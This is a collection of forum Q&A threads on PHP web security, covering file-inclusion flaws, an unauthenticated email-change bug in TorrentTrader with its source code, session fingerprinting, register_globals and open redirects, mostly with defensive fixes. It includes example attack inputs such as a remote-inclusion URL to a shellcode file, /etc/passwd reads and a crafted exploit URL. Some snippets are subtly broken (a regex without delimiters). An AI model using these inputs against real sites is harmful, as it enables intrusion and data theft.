I'm learning php on my own now and I'm developing some simple sites using php include to ease the page creation process.
I've searched this website for ways to make it secure but, as a noob, I'm always afraid of messing up.
<?php
$siteArticles = array('instalacoes','galeria','regiao-e-historia','precos','contactos');
if( isset($_GET['page']) ){
if( in_array($_GET['page'], $siteArticles, true) && file_exists('pt/'.'rbs-article-'.$_GET['page'].'.php') ){
include('pt/'.'rbs-article-'.$_GET['page'].'.php');
}
}else{
include('pt/rbs-article-home.php');
}
?>
As you can see, it first checks if the page's allowed through the array and then add a prefix to the name file.
My question is, how secure is this?
Thank you for your time.
It is secure. The in_array() check is what makes it secure. It is not possible to perform a Local File Inclusion (LFI) attack on this code simply because the requested page must exactly match one of the elements in the whitelist array.
Related
So I have a PHP script that I myself have not designed but has a known security flaw. There's an admin panel where the admin can change various profile settings for every user, including their email address. The security flaw is such that anyone who knows the correct URL can change the email address of any registered user, including the admin, so long as they know the corresponding user's ID, by simply calculating the MD5 hash of the new email address they want to change to and issuing a GET request, without ever having to login as an admin. For example, entering the following URL into your browser:
admin.php?userid=1&md5hash=c59152a77c0bc073fe6f2a3141b99010&email=blah#blah.com
Would successfully update the email address of user with ID of "1" to blah#blah.com.
Now from what research I've done so far it appears that ditching MD5 hashes for a slight more proprietary/secure form of encryption would be the best/most secure way of going about this. But while I feel I have a fairly good understanding of PHP and have written a few basic scripts myself, since I haven't designed the particular script in question I'm not sure if this would actually be possible and/or plausible. Also, people do still use MD5 hashes in practice so there must exist another equally feasible way to protect aganist such exploits which led me to looking in to Apache's mod_rewrite module to block specific types of GET requests:
[redacted for irrelevance because of max link limit of 2 for new users]
So my questions would be:
1) Disregarding whether or not it would actually be feasible, would changing the PHP script to using some other form of encryption besides MD5 hashes be the BEST possible way to go about this? Or is there some simple function that I can add to the PHP script itself to protect from this kind of exploit?
2) If I went the route of using Apache's mod_rewrite as describe in the above URL, what would be the best method (out of THE_REQUEST, HTTP_REFERER, HTTP_COOKIE, REQUEST_URI, HTTP_USER_AGENT, QUERY_STRING, and/or REMOTE_ADDR, where REQUEST_METHOD is "GET")? Or is it even possible to do what I'm trying to do this way?
3) Someone had also suggested it may be possible to do what I am trying to do via a .htaccess file? Is this possible and would this method be anymore more or less secure than the other 2 mentioned?
The only thing to take into consideration is that via whichever method I end up using, obviously the server would have to still be able to issue the request for when the admin wants to legitimately change a user's email address. I just need to update it so that the general public cannot change a user's email address by simply typing the correct URL into their browser, given they know the correct user ID. Thanks in advance.
---> EDIT: Sorry I was neglecting to name the particular script because it is a publicly available one and I wasn't sure if this particular exploit was a known one but turns out it is, so I guess there's no harm in posting it here. The script is TorrentTrade (v2.08)- you can download the entire script at SourceForge (https://sourceforge.net/projects/torrenttrader/).
I've also copied and pasted the entirety of account-ce.php:
<?php
//
// TorrentTrader v2.x
// $LastChangedDate: 2012-09-28 20:35:06 +0100 (Fri, 28 Sep 2012) $
// $LastChangedBy: torrenttrader $
//
// http://www.torrenttrader.org
//
require_once("backend/functions.php");
dbconn();
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
if (!$id || !$md5 || !$email)
show_error_msg(T_("ERROR"), T_("MISSING_FORM_DATA"), 1);
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `editsecret` != '' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
if (!$row)
show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
$sec = $row["editsecret"];
if ($md5 != md5($sec . $email . $sec))
show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
header("Refresh: 0; url=account.php");
header("Location: account.php");
?>
account-ce.php is the .php file referenced in following list of several known exploits (the first exploit is the only one i'm looking at right now):
https://www.exploit-db.com/exploits/21396/
I figured rather than sit around and wait for TorrentTrader to release a new update I would try and be proactive and fix some of the exploits myself.
You need to include in a session handler. I would like to assume that a user is required to login before being allowed to access any admin page, and that some sort of login credential or user id is saved to a session variable. To implement that you would need to have a script like this included on every page:
<?php
session_start();
if(!isset($_SESSION['uid'])){
$redirect_url='login.php';
if(isset($_SERVER['HTTP_REFERER'])){
$redirect_url.='?target='.urlencode($_SERVER['HTTP_REFERER']);
}
header('Location: '.$redirect_url);
}
?>
$_SESSION['uid'] is somewhat arbitrary and could be any session variable you deem sufficient for the security of your application. Note: session variables are connected to the user and are saved from page to page until the session is destroyed by calling session_destroy().
If the above script is executed prior to every page load, then when some evil hacker tries to trigger the script without being logged in, they will be redirected to login.php before the rest of the script/page is executed/loaded.
The current script is very insecure, but the insecurity does not arise from the use of the md5 hash. It would be really difficult to bolt security on top a system like this using just Apache configuration.
You might want to start by reading up on session security and cross site request forgery.
You need to write some code. And since you've not posted any code nor proposed a specific solution, your question is rather off topic here.
Alright guys I feel moderately stupid now, but thank you for the tips on using the session handler as that is what ultimately pointed me in the correct direction and to look in the right place. After digging around it seems as though that particular admin file (account-ce.php), for whatever reason, was just missing this:
loggedinonly();
which is defined in backend/functions.php as:
function loggedinonly() {
global $CURUSER;
if (!$CURUSER) {
header("Refresh: 0; url=account-login.php?returnto=" . urlencode($_SERVER["REQUEST_URI"]));
exit();
}
}
Also, I plan to read up on session security as you suggested so I can better familiarize myself with how sessions are used for this purpose. Thanks again! :)
I'm using these docs to integrate a certain level of protection against session hijacking (bottom of page).
While I can understand the basics of what the article explains, I'm still new to all this and I'm just not able to pin-point what I should do.
I get how this would work:
<?php
session_start();
if (isset($_SESSION['HTTP_USER_AGENT']))
{
if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
{
/* Prompt for password */
exit;
}
}
else
{
$_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}
?>
... and I kinda understand how this can make the above more secure:
<?php
$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';
/* Add any other data that is consistent */
$fingerprint = md5($string);
?>
However, I'm stuck at combining the two into one working script. The docs state:
we should pass this fingerprint as a URL variable.
What does that mean? Do I need to pass the fingerprint in the URL and then use $_GET on each page? Anyone who can help me combining these two snippets of code into one file that I can include in all my PHP files?
yes, you'd need to add this token to any urls and then check it on every page.
Basically what you're trying to accomplish is what cryptographers call a NONCE
(number used once). The idea is to generate the NONCE using the params and then validate that the params haven't been tampered with.
Ideally this should be a hash salted with something random
and used once. There are many libraries that will take care of it for you.
Remember that hashes are not symmetric, i.e you can't un-hash request variables to see that it's the same thing.
What you can do is take a hash of the parameters and compare the hashes. It's important to remember about salts, because without them you'd be susceptible to rainbow tables.
Also if you use $_REQUEST rather than $_GET you can reuse the same logic for both $_POST and $_GET
You can take a look at this library for example, http://fullthrottledevelopment.com/php-nonce-library
you can also borrow the nonce generating code from Wordpress
I've been working on a project on my local server. The time has come to upload it so I did just that. I started to test it out online and my navigation isn't working.
The navigation works by doing this:
Add
The page then checks whether $p exists and if it does, it shows the relevant content. For some reason though my content isn't showing up when I click the links. I turned on error reporting, and I added this (line 39)
echo $p;
to the document. Now I get this error: Notice: Undefined variable: p in /home/silver/public_html/admin/index.php on line 39 but only when testing online and it works fine when I test it locally.
I can post my code if I need to, but there's a lot of it and I'm not sure which bit is the problem.
UPDATE:
Thanks for all the replies, but I'm confused as to how you use your suggestions as I'm used to doing things the way I was.
At the moment, I do this to check what the $p variable is
<?php if(!isset($p)) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
And use this to link to the page:
Add New Item
You're relying upon register_globals, an outdated and deprecated feature of PHP. This feature automatically translates GET, POST, COOKIE, SERVER etc. variables and inserts them into the global scope. This means that file.php?p=blah would result in $p == 'blah'. This is a bad idea for lots of different scoping and security reasons outlined in the PHP manual.
Use the superglobals (e.g. $_GET, $_POST, $_SERVER) instead.
In response to your updated question, your code
<?php if(!isset($p)) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
should become
<?php if(!isset($_GET['p'])) { // DEFAULT PAGE VIEWED AT INDEX.PHP ?>
You're relying on an old and very bad "feature" of PHP called register_globals that loads variables directly from GET. You need to do $p = $_GET['p'] if you want $p to be set via an HTTP GET.
Probably because 'register_globals' is ON on your dev system and OFF on your live system. Set it to OFF on your dev and use $_GET['p']
$p doesn't automatically get set from the parameter in the URL. You need to attach $p to the value coming from the URL by using the code $p = $_GET['p']; first.
Be weary though, you need to sanitize this GET parameter and/or create a whitelist to make sure it is a valid parameter.
I am really new to online web application. I am using php, I got this code:
if(isset($_GET['return']) && !empty($_GET['return'])){
return = $_GET['return'];
header("Location: ./index.php?" . $return);
} else {
header("Location: ./index.php");
}
the $return variable is URL variable which can be easily changed by hacker.
E.g i get the $return variable from this : www.web.com/verify.php?return=profile.php
Is there anything I should take care? Should I use htmlentities in this line:
header("Location: ./index.php?" . htmlentities($return));
Is it vulnerable to attack by hacker?
What should i do to prevent hacking?
Apart from that typo on line 2 (should be $return = $_GET['return'];) you should do $return = urlencode($return) to make sure that $return is a valid QueryString as it's passed as parameter to index.php.
index.php should then verify that return is a valid URL that the user has access to. I do not know how your index.php works, but if it simply displays a page then you could end up with someting like index.php?/etc/passwd or similar, which could indeed be a security problem.
Edit: What security hole do you get? There are two possible problems that I could see, depending how index.php uses the return value:
If index.php redirects the user to the target page, then I could use your site as a relay to redirect the user to a site I control. This could be either used for phishing (I make a site that looks exactly like yours and asks the user for username/password) or simply for advertising.
For example, http://yoursite/index.php?return?http%3A%2F%2Fwww.example.com looks like the user accesses YourSite, but then gets redirected to www.example.com. As I can encode any character using the %xx notation, this may not even be obvious to the user.
If index.php displays the file from the return-parameter, I could try to pass in the name of some system file like /etc/passwd and get a list of all users. Or I could pass something like ../config.php and get your database connection
I don't think that's the case here, but this is such a common security hole I'd still like to point it out.
As said, you want to make sure that the URL passed in through the querystring is valid. Some ways to do that could be:
$newurl = "http://yoursite/" . $return;
this could ensure that you are always only on your domain and never redirect to any other domain
$valid = file_exists($return)
This works if $return is always a page that exists on the hard drive. By checking that return indeed points to a valid file you can filter out bogus entries
If return would accept querystrings (i.e. return=profile.php?step=2) then you would need to parse out the "profile.php" path
Have a list of valid values for $return and compare against it
this is usually impractical, unless you really designed your application so that index.php can only return t a given set of pages
There are many ways to skin this cat, but generally you want to somehow validate that $return points to a valid target. What those valid targets are depends on your specification.
If you're running an older version of both PHP 4 or 5, then I think you will be vulnerable to header injection - someone can set return to a URL, followed by a line return, followed by any other headers they want to make your server send.
You could avoid this by sanitising the string first. It might be enough to strip line returns but it would be better to have an allowed list of characters - this might be impractical.
4.4.2 and 5.1.2: This function now prevents more than one header to be
sent at once as a protection against
header injection attacks.
http://php.net/manual/en/function.header.php
What would happen if you put in a page that didn't exist. For example:
return=blowup.php
or
return=http://www.google.co.uk
or
return=http%3A%2F%2Fwww.google.co.uk%2F
You could obfuscate the reference by not including the .php in the variable. You could then append it in the code-behind and check for the existence of the file in your directory / use a switch statement of allowable values before redirecting to it.
In this case, it more depends on what's done with that part of the query string on index.php. If it's being sent to a database query, output, eval(), or exec() yes, its a very common security hole. Most other situations will be safe unfiltered, but its best to write your own general purpose sanitizing function which converts quotes of all varieties to their HTML entity, as well as equals symbols.
The things I would do are:
Define, what type of return values are allowed?
Write down all types of possible return values.
Then, make conclusions: what characters are not allowed, what is the maximum url length, what domains are allowed, etc.
Finally: make a filter function according to above conclusions.
I Thing hacker can do this
you will redirect if $_GET['return'] Contain any thing
the hacker can use it as xss
redirect to virus or any thing like it
but there is no ability to make any thing else
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority